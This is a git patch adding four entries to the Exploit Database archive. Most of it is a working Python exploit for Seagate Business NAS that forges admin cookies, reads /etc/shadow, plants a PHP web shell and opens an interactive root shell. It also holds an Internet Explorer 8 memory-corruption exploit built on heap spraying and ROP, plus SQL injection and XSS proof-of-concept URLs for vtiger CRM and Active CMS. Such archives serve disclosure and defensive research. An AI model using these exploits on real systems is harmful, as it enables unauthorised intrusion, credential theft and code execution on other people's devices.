From 0853b7e8a42741815c879614cf3e8e33a57fd12b Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Mon, 2 Mar 2015 08:35:29 +0000
Subject: [PATCH] Update: 2015-03-02

4 new exploits
---
 files.csv                           |   4 +
 platforms/hardware/webapps/36202.py | 330 ++++++++++++++++++++++++++++
 platforms/php/webapps/36208.txt     |  15 ++
 platforms/php/webapps/36213.txt     |   9 +
 platforms/windows/remote/36209.html | 283 ++++++++++++++++++++++++
 5 files changed, 641 insertions(+)
 create mode 100755 platforms/hardware/webapps/36202.py
 create mode 100755 platforms/php/webapps/36208.txt
 create mode 100755 platforms/php/webapps/36213.txt
 create mode 100755 platforms/windows/remote/36209.html

diff --git a/files.csv b/files.csv
index dd72e571e..8cb97c0c4 100755
--- a/files.csv
+++ b/files.csv
@@ -32631,7 +32631,11 @@ id,file,description,date,author,platform,type,port
 36199,platforms/linux/remote/36199.txt,"Perl 5.x Digest Module 'Digest->new()' Code Injection Vulnerability",2011-10-02,anonymous,linux,remote,0
 36200,platforms/php/webapps/36200.txt,"Netvolution 2.5.8 'referer' Header SQL Injection Vulnerability",2011-10-03,"Patroklos Argyroudis",php,webapps,0
 36201,platforms/php/webapps/36201.txt,"Phorum 5.2.18 'admin/index.php' Cross-Site Scripting Vulnerability",2011-10-03,"Stefan Schurtz",php,webapps,0
+36202,platforms/hardware/webapps/36202.py,"Seagate Business NAS <= 2014.00319 - Pre-Authentication Remote Code Execution (0day)",2015-03-01,"OJ Reeves",hardware,webapps,80
 36203,platforms/php/webapps/36203.txt,"vtiger CRM 5.2.1 index.php Multiple Parameter XSS",2011-10-04,"Aung Khant",php,webapps,0
 36204,platforms/php/webapps/36204.txt,"vtiger CRM 5.2.1 phprint.php Multiple Parameter XSS",2011-10-04,"Aung Khant",php,webapps,0
 36205,platforms/hardware/remote/36205.txt,"SonicWALL SessId Cookie Brute-force Weakness Admin Session Hijacking",2011-10-04,"Hugo Vazquez",hardware,remote,0
 36206,platforms/windows/remote/36206.rb,"Persistent Systems Client Automation Command Injection RCE",2015-02-27,"Ben Turner",windows,remote,3465
+36208,platforms/php/webapps/36208.txt,"vtiger CRM 5.2 'onlyforuser' Parameter SQL Injection Vulnerability",2011-10-15,"Aung Khant",php,webapps,0
+36209,platforms/windows/remote/36209.html,"Microsoft Internet Explorer 8 Select Element Memory Corruption Vulnerability",2011-10-11,"Ivan Fratric",windows,remote,0
+36213,platforms/php/webapps/36213.txt,"Active CMS 1.2 'mod' Parameter Cross Site Scripting Vulnerability",2011-10-06,"Stefan Schurtz",php,webapps,0
diff --git a/platforms/hardware/webapps/36202.py b/platforms/hardware/webapps/36202.py
new file mode 100755
index 000000000..cc3a251ef
--- /dev/null
+++ b/platforms/hardware/webapps/36202.py
@@ -0,0 +1,330 @@
+#!/usr/bin/env python
+#
+# Seagape
+# =======
+# Seagate Business NAS pre-authentication remote code execution
+# exploit as root user.
+#
+# by OJ Reeves (@TheColonial) - for full details please see
+# https://beyondbinary.io/advisory/seagate-nas-rce/
+#
+# Usage
+# =====
+# seagape.py <ip> <port> [-c [ua]]
+#
+# - ip   : ip or host name of the target NAS
+# - port : port of the admin web ui
+# - -c   : (optional) create a cookie which will give admin access.
+#          Not specifying this flag results in webshell installation.
+# - ua   : (optional) the user agent used by the browser for the
+#          admin session (UA must match the target browser).
+#          Default value is listed below
+#
+# Example
+# =======
+# Install and interact with the web shell:
+# seagape.py 192.168.0.1 80
+#
+# Create admin cookie
+# seagape.py 192.168.0.1 80 -c
+
+import base64
+import hashlib
+import itertools
+import os
+import re
+import socket
+import sys
+import urllib
+import urllib2
+import uuid
+import xml.sax.saxutils
+
+if len(sys.argv) < 3:
+    print "Usage: {0} <ip> <port> [-c [user agent]]".format(sys.argv[0])
+    sys.exit(1)
+
+# Every Seagate nas has the same XOR key. Great.
+XOR_KEY = '0f0a000d02011f0248000d290d0b0b0e03010e07'
+
+# This is the User agent we'll use for most of the requests
+DEFAULT_UA = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10'
+
+# This is the description we're going to be reading from
+LFI_FILE = '/etc/devicedesc'
+
+# the base globals that will hold our state
+host = sys.argv[1]
+port = int(sys.argv[2])
+cis = ''
+hostname = ''
+webshell = str(uuid.uuid1()) + ".php"
+
+def chunks(s, n):
+    for i in xrange(0, len(s), n):
+        yield s[i:i + n]
+
+def forward_interleave(a, b):
+    return ''.join(itertools.chain(*zip(itertools.cycle(a), b)))
+
+def xor(s, k):
+    return ''.join(chr(ord(a) ^ ord(b)) for a, b in itertools.izip(s, itertools.cycle(k)))
+
+def sha1(s):
+    return hashlib.sha1(s).hexdigest()
+
+def decode(s):
+    f = xor(s, XOR_KEY)
+    return ''.join(chr(ord(a) ^ ord(b)) for a, b in chunks(f, 2))
+
+def encode(s):
+    s = forward_interleave(sha1(s), s)
+    s = ''.join(a + chr(ord(a) ^ ord(b)) for a, b in chunks(s, 2))
+    return xor(s, XOR_KEY)
+
+def make_request(uri = "/", ci_session = None, headers = None, post_data = None):
+
+    method = 'GET'
+
+    if not headers:
+        headers = {}
+
+    headers['Host'] = host
+
+    if 'User-Agent' not in headers:
+        headers['User-Agent'] = DEFAULT_UA
+
+    if 'Accept' not in headers:
+        headers['Accept'] = 'text/html'
+
+    if post_data:
+        method = 'POST'
+        post_data = urllib.urlencode(post_data)
+        headers['Content-Type'] = 'application/x-www-form-urlencoded'
+
+    if ci_session:
+        ci_session = urllib.quote(base64.b64encode(encode(ci_session)))
+        headers['Cookie'] = 'ci_session={0}'.format(ci_session)
+
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    s.connect((host, port))
+
+    http  = ""
+    http += "{0} {1} HTTP/1.1\r\n".format(method, uri)
+
+    for h in headers:
+        http += "{0}: {1}\r\n".format(h, headers[h])
+
+    if post_data:
+        http += "Content-Length: {0}\r\n".format(len(post_data))
+
+    http += "\r\n"
+
+    if post_data:
+        http += post_data
+
+    s.send(http)
+
+    result = ""
+    while True:
+        data = s.recv(1024)
+        if not data:
+            break
+        result += data
+
+    s.close()
+
+    return result
+
+def get_ci_session():
+    resp = make_request()
+
+    for l in resp.split("\r\n"):
+        m = re.findall("Set-Cookie: ([a-zA-Z0-9_\-]+)=([a-zA-Z0-9\+%=/]+);", l)
+        for name, value in m:
+            if name == 'ci_session' and len(value) > 40:
+                return decode(base64.b64decode(urllib.unquote(value)))
+
+    print "Unable to establish session with {0}".format(host)
+    sys.exit(1)
+
+def add_string(ci_session, key, value):
+    prefix = 's:{0}:"{1}";s:'.format(len(key), key)
+    if prefix in ci_session:
+        ci_session = re.sub(r'{0}\d+:"[^"]*"'.format(prefix), '{0}{1}:"{2}"'.format(prefix, len(value), value), ci_session)
+    else:
+        # doesn't exist, so we need to add it to the start and the end.
+        count = int(ci_session.split(':')[1]) + 1
+        ci_session = re.sub(r'a:\d+(.*)}$', r'a:{0}\1{1}{2}:"{3}";}}'.format(count, prefix, len(value), value), ci_session)
+    return ci_session
+
+def set_admin(ci_session):
+    return add_string(ci_session, "is_admin", "yes")
+
+def set_language(ci_session, lang):
+    return add_string(ci_session, "language", lang)
+
+def include_file(ci_session, file_path):
+    if file_path[0] == '/':
+        file_path = '../../../../../..' + file_path
+    return set_language(ci_session, file_path + "\x00")
+
+def read_file(file_path, post_data = None):
+    resp = make_request(ci_session = include_file(cis, file_path), headers = {}, post_data = post_data)
+    return resp
+
+def hashdump():
+    shadow = read_file('/etc/shadow')
+    for l in shadow.split("\n"):
+        if l and ':!:' not in l and ':x:' not in l:
+            parts = l.split(':')
+            print "{0}:{1}".format(parts[0], parts[1])
+
+def cmd(command):
+    headers = {
+        'Content-Type' : 'application/x-www-form-urlencoded',
+        'Accept' : '*/*',
+        'User-Agent' : DEFAULT_UA
+    }
+
+    post_data = urllib.urlencode({'c' : command})
+    headers['Content-Type'] = 'application/x-www-form-urlencoded'
+
+    ci_session = urllib.quote(base64.b64encode(encode(cis)))
+    headers['Cookie'] = 'ci_session={0}'.format(ci_session)
+
+    url = 'http://{0}:{1}/{2}'.format(host, port, webshell)
+    req = urllib2.Request(url, headers = headers, data = post_data)
+
+    return urllib2.urlopen(req).read()
+
+def shell():
+    running = True
+    while running:
+        c = raw_input("Shell ({0}) $ ".format(post_id))
+        if c != 'quit' and c != 'exit':
+            cmd(c)
+        else:
+            running = False
+
+def show_admin_cookie(user_agent):
+    ci_session = add_string(cis, 'is_admin', 'yes')
+    ci_session = add_string(ci_session, 'username', 'admin')
+    ci_session = add_string(ci_session, 'user_agent', user_agent)
+    ci_session = urllib.quote(base64.b64encode(encode(ci_session)))
+    print "Session cookies are bound to the browser's user agent."
+    print "Using user agent: " + user_agent
+    print "ci_session=" + ci_session
+
+def show_version():
+    print "Firmware Version: {0}".format(get_firmware_version())
+
+def show_cookie():
+    print cis
+
+def show_help():
+    print ""
+    print "Seagape v1.0 -- Interactive Seagate NAS Webshell"
+    print "  - OJ Reeves (@TheColonial) - https://beyondbinary.io/"
+    print "  - https://beyondbinary.io/bbsec/001"
+    print "==========================================================================="
+    print "version           - Print the current firmware version to screen."
+    print "dumpcookie        - Print the current cookie to screen."
+    print "admincookie <ua>  - Create an admin login cookie (ua == user agent string)."
+    print "                    Add to your browser and access ANY NAS box as admin."
+    print "help              - Show this help."
+    print "exit / quit       - Run for the hills."
+    print "<anything else>   - Execute the command on the server."
+    print ""
+
+def execute(user_input):
+    result = True
+    parts = user_input.split(' ')
+    c = parts[0]
+
+    if c == 'admincookie':
+        ua = DEFAULT_UA
+        if len(parts) > 1:
+            ua = ' '.join(parts[1:])
+        show_admin_cookie(ua)
+    elif c == 'dumpcookie':
+        show_cookie()
+    elif c == 'version':
+        show_version()
+    elif c == 'help':
+        show_help()
+    elif c == 'quit' or c == 'exit':
+        remove_shell()
+        result = False
+    else:
+        print cmd(user_input)
+    return result
+
+def get_firmware_version():
+    resp = make_request("/index.php/mv_system/get_firmware?_=1413463189043",
+            ci_session = acis)
+    return resp.replace("\r", "").replace("\n", "").split("version")[1][1:-2]
+
+def install_shell():
+    resp = make_request("/index.php/mv_system/get_general_setup?_=1413463189043",
+            ci_session = acis)
+    existing_setup = ''
+    for l in resp.split("\r\n"):
+        if 'general_setup' in l:
+            existing_setup = l
+            break
+
+    # generate the shell and its installer
+    exec_post = base64.b64encode("<?php if(isset($_POST['c'])&&!empty($_POST['c'])){system($_POST['c']);} ?>")
+    installer = '<?php file_put_contents(\'{0}\', base64_decode(\'{1}\')); ?>'.format(webshell, exec_post)
+    write_php = xml.sax.saxutils.quoteattr(installer)[1:-1]
+    start = existing_setup.index('" description="') + 15
+    end = existing_setup.index('"', start)
+    updated_setup = existing_setup[0:start] + write_php + existing_setup[end:]
+
+    # write the shell to the description
+    resp = make_request("/index.php/mv_system/set_general_setup?_=1413463189043",
+            ci_session = acis,
+            headers = { },
+            post_data = { 'general_setup' : updated_setup })
+
+    # invoke the installer
+    read_file(LFI_FILE)
+
+    # remove the installer
+    resp = make_request("/index.php/mv_system/set_general_setup?_=1413463189043",
+            ci_session = acis,
+            headers = { },
+            post_data = { 'general_setup' : existing_setup })
+
+def remove_shell():
+    return cmd('rm -f {0}'.format(webshell))
+
+print "Establishing session with {0} ...".format(host)
+cis = get_ci_session()
+
+if len(sys.argv) >= 4 and sys.argv[3] == '-c':
+    ua = DEFAULT_UA
+    if len(sys.argv) > 4:
+        ua = sys.argv[4]
+    show_admin_cookie(ua)
+else:
+    print "Configuring administrative access ..."
+    acis = add_string(cis, 'is_admin', 'yes')
+    acis = add_string(acis, 'username', 'admin')
+
+    print "Installing web shell (takes a while) ..."
+    install_shell()
+
+    print "Extracting id and hostname ..."
+    identity = cmd('whoami').strip()
+    hostname = cmd('cat /etc/hostname').strip()
+    show_help()
+
+    running = True
+    while running:
+        try:
+            user_input = raw_input("Seagape ({0}@{1})> ".format(identity, hostname))
+            running = execute(user_input)
+        except:
+            print "Something went wrong. Try again."
diff --git a/platforms/php/webapps/36208.txt b/platforms/php/webapps/36208.txt
new file mode 100755
index 000000000..a6e96e83a
--- /dev/null
+++ b/platforms/php/webapps/36208.txt
@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/49948/info
+
+vtiger CRM is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+vtiger CRM 5.2.1 is vulnerable; prior versions may also be affected.
+
+http://www.example.com/index.php?action=index&module=Calendar&view=week&hour=0&day=5&month=12&year=2011&viewOption=listview&subtab=event&parenttab=My&onlyforuser=1+or+1%3d1--
+
+http://www.example.com/index.php?action=index&module=Calendar&view=week&hour=0&day=5&month=12&year=2011&viewOption=listview&subtab=event&parenttab=My&onlyforuser=1+or+1%3d2--
+
+http://www.example.com/index.php?action=index&module=Calendar&view=week&hour=0&day=5&month=12&year=2011&viewOption=listview&subtab=event&parenttab=My&onlyforuser=1+or+@@version%3d5--
+
+http://www.example.com/index.php?action=index&module=Calendar&view=week&hour=0&day=5&month=12&year=2011&viewOption=listview&subtab=event&parenttab=My&onlyforuser=1+or+@@version%3d4-- 
\ No newline at end of file
diff --git a/platforms/php/webapps/36213.txt b/platforms/php/webapps/36213.txt
new file mode 100755
index 000000000..e97a0815f
--- /dev/null
+++ b/platforms/php/webapps/36213.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/50001/info
+
+Active CMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Active CMS 1.2.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/activecms/admin/admin?action=module&mod=&#039;<script>alert(document.cookie)</script>
\ No newline at end of file
diff --git a/platforms/windows/remote/36209.html b/platforms/windows/remote/36209.html
new file mode 100755
index 000000000..fa411dfb3
--- /dev/null
+++ b/platforms/windows/remote/36209.html
@@ -0,0 +1,283 @@
+source: http://www.securityfocus.com/bid/49964/info
+
+Microsoft Internet Explorer is prone to a remote memory-corruption vulnerability.
+
+Successful exploits will allow an attacker to run arbitrary code in the context of the user running the application. Failed attacks may cause denial-of-service conditions. 
+
+<html>
+<head>
+</head>
+
+<body>
+
+
+<script type="text/javascript">
+<!--
+
+//originally, windows 7 compatible calc.exe shellcode from SkyLined
+var scode = "removed";
+
+var newstack,newstackaddr;
+var fakeobj;
+
+var spray,spray2,selarray,readindex,readaddr,optarryaddr;
+var elms = new Array();
+
+var optarray;
+
+var mshtmlbase;
+
+//option object that is to be corrupted
+var corruptedoption;
+var corruptedoptionaddr;
+var corruptaddr;
+
+function strtoint(str) {
+    return str.charCodeAt(1)*0x10000 + str.charCodeAt(0);
+}
+
+function inttostr(num) {
+    return String.fromCharCode(num%65536,Math.floor(num/65536));
+}
+
+function crash() {
+    var o = new Option();
+    selarray[99].options.add(o,-0x20000000);
+}
+
+function readmem(addr) {
+    if(addr < readaddr) alert("Error, can't read that address");
+    return strtoint(spray[readindex].substr((addr-readaddr)/2,2));
+}
+
+function readmem2(addr,size) {
+    if(addr < readaddr) alert("Error, can't read that address");
+    return spray[readindex].substr((addr-readaddr)/2,size/2);
+}
+
+function overwrite(addr) {
+    try {
+        var index = (addr-optarryaddr)/4 - 0x40000000;
+        selarray[99].options.add(optarray.pop(),index);
+    } catch(err) {}   
+}
+
+function getreadaddr() {
+    readaddr = 0;
+    var indexarray = new Array();
+    var tmpaddr = 0;
+    var i,index;
+    
+    index = readmem(tmpaddr);
+    indexarray.push(index);
+    
+    while(1) {
+        tmpaddr += 0x100000;
+        index = readmem(tmpaddr);
+        for(i=0;i<indexarray.length;i++) {
+            if(indexarray[i]==index+1) {
+                readaddr = readmem(tmpaddr-0x24)-i*0x100000+0x24;
+                return 1;
+            } else if(indexarray[i]==index-1) {
+                readaddr = readmem(tmpaddr-0x20)-i*0x100000+0x24;
+                return 1;               
+            }
+        }
+        indexarray.push(index);
+    }
+}
+
+//leverages the vulnerability into memory disclosure
+function initread() {
+    //overwrite something in a heap spray slide
+    try {
+        selarray[99].options.add(optarray.pop(),-100000000/4);
+    } catch(err) {}
+    
+    //now find what and where exectly did we overwrite
+    readindex = -1;
+    var i;
+    for(i=1;i<200;i++) {
+        if(spray[0].substring(2,spray[0].length-2)!=spray[i].substring(2,spray[0].length-2))
+{
+            readindex = i;
+            break;
+        }
+    }
+
+    if(readindex == -1) {
+        alert("Error overwriring first spray");
+        return 0;
+    }
+
+    var start=2,len=spray[readindex].length-2,mid;
+    while(len>10) {
+        mid = Math.round(len/2);
+        mid = mid - mid%2;
+        if(spray[readindex].substr(start,mid) !=
+spray[readindex-1].substr(start,mid)) {
+            len = mid;
+        } else {
+            start = start+mid;
+            len = len-mid;
+            //if(spray[readindex].substr(start,mid) ==
+spray[readindex-1].substr(start,mid)) alert("error");
+        }
+    }
+    
+    for(i=start;i<(start+20);i=i+2) {
+        if(spray[readindex].substr(i,2) != spray[readindex-1].substr(i,2)) {
+            break;
+        }
+    }
+    
+    //overwrite the string length
+    try {
+        selarray[99].options.add(optarray.pop(),-100000000/4-i/2-1);
+    } catch(err) {}
+       
+    if(spray[readindex].length == spray[readindex-1].length) alert("error
+overwriting string length");
+    
+    //readaddr = strtoint(spray[readindex].substr((0x100000-4-0x20+4)/2,2))+0x24;
+    getreadaddr();
+    
+    optarryaddr = readaddr + 100000000 + i*2;
+
+    return 1;   
+}
+
+function trysploit() {
+    //create some helper objects
+    for(var i =0; i < 100; i++) {
+        elms.push(document.createElement('div'));
+    }
+
+    //force the option cache to rebuild itself
+    var tmp1 = selarray[99].options[70].text;
+
+    //overwrite the CTreeNode pointer
+    overwrite(corruptaddr);
+    //read the address of the option object we overwrited with
+    var optadr = readmem(corruptaddr);
+    //delete the option object...
+    selarray[99].options.remove(0);
+    
+    CollectGarbage();
+    
+    //...and allocate some strings in its place
+    for(var i = 0; i < elms.length; i++) {
+        elms[i].className = fakeobj;
+    }
+
+    //verify we overwrote the deleted option object successfully
+    if(readmem(optadr) != strtoint(fakeobj.substr(0,2))) return 0;
+
+    alert("success, calc.exe should start once you close this message box");
+
+    //now do something with the corrupted option object
+    corruptedoption.parentNode.click();
+}
+
+function hs() {
+    
+    //first heap spray, nop slide + shellcode   
+    spray = new Array(200);
+    var pattern = unescape("%u0C0C%u0C0C");
+    while(pattern.length<(0x100000/2)) pattern+=pattern;
+    pattern = pattern.substr(0,0x100000/2-0x100);
+    for(var i=0;i<200;i++) {
+        spray[i] = [inttostr(i)+pattern+scode].join("");
+    }
+
+    //fill small gaps, we wan everything _behind_ our heap spray so that
+we can read it
+    var asmall = new Array(10000);
+    pattern = "aaaa";
+    while(pattern.length<500) pattern+=pattern;
+    for(var i=0;i<10000;i++) {
+        asmall[i]=[pattern+pattern].join("");
+    }
+    
+    //create some select and option elements
+    selarray = new Array(100);
+    for(var i=0;i<100;i++) {
+        selarray[i] = document.createElement("select");
+        for(var j=0;j<100;j++) {
+            var o = new Option("oooooooooooooooooo","ooooooooooooooooooooo");
+            selarray[i].options.add(o,0);
+        }
+    }
+    
+    //create some extra option elements
+    optarray = new Array(10000);
+    for(var i=0;i<10000;i++) {
+        optarray[i] = new Option("oooooooooooooooooo","ooooooooooooooooooooo");
+    }
+    
+    //enable memory disclosure
+    if(initread()==0) return;
+
+    //force the option cache to rebuild itself
+    var tmp1 = selarray[99].options[60].text;
+    
+    //get the address of some option element to be corrupted, also remove
+it from its select element, we don't want anything else messing with
+it
+    corruptedoptionaddr = readmem(optarryaddr+60*4);
+    corruptedoption = selarray[99].options[60];
+    selarray[99].options.remove(60);
+    
+    //get the base address of mshtml.dll based on the vtable address
+inside the option object
+    mshtmlbase = readmem(corruptedoptionaddr)-0xFC0C0;
+    alert("base address of mshtml.dll : " + mshtmlbase.toString(16));
+
+    //we'll overwrite the pointer to the CTreeNode object, compute its address
+    corruptaddr = corruptedoptionaddr+0x14;
+
+    //second heap-spray, this one will act as a stack (we'll exchange
+stack pointer with a pointer into this)
+    spray2 = new Array(200);   
+
+    //some address that is likely to be inside the "stack"
+    newstackaddr = optarryaddr+100000000;
+    newstackaddr-=newstackaddr%0x1000;
+    newstackaddr+=0x24;
+
+    //assemble the "stack" so that it calls VirtualProtect on the firs
+shellcode and then jumps into it through return-oriented-programming
+    newstack = inttostr(newstackaddr+0x10)+unescape("%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA")+inttostr(newstackaddr+0x14)+inttostr(mshtmlbase+0x14EF7)+inttostr(mshtmlbase+0x1348)+inttostr(mshtmlbase+0x801E8)+inttostr(readaddr+0x100000-0x24)+inttostr(0x100000)+inttostr(0x40)+inttostr(readaddr+0x1000)+inttostr(readaddr+0x101000)+unescape("%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA")+inttostr(mshtmlbase+0x1B43F);
+    while(newstack.length<(0x1000/2))
+newstack+=unescape("%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA");
+    newstack = newstack.substr(0,0x1000/2);
+    while(newstack.length<(0x100000/2)) newstack+=newstack;
+    newstack = newstack.substr(0,0x100000/2-0x100);
+    for(var i=0;i<200;i++) {
+        spray2[i] = [newstack].join("");
+    }
+    
+    //constract a fake object which will replace a deleted option object
+(it has to be the same size)
+    //fakeobj = unescape("%u4141%u4141")+inttostr(newstackaddr)+unescape("%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141");
+    fakeobj = unescape("%u4141%u4141%u4141%u4141")+unescape("%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141");
+    
+    //loop until we either achieve command execution or fail
+    for(var i=0;i<100;i++) {
+        trysploit();
+    }
+    
+    alert("Exploit failed, try again");
+
+}
+
+
+hs();
+
+
+-->
+</script>
+
+
+</body>
+</html>
\ No newline at end of file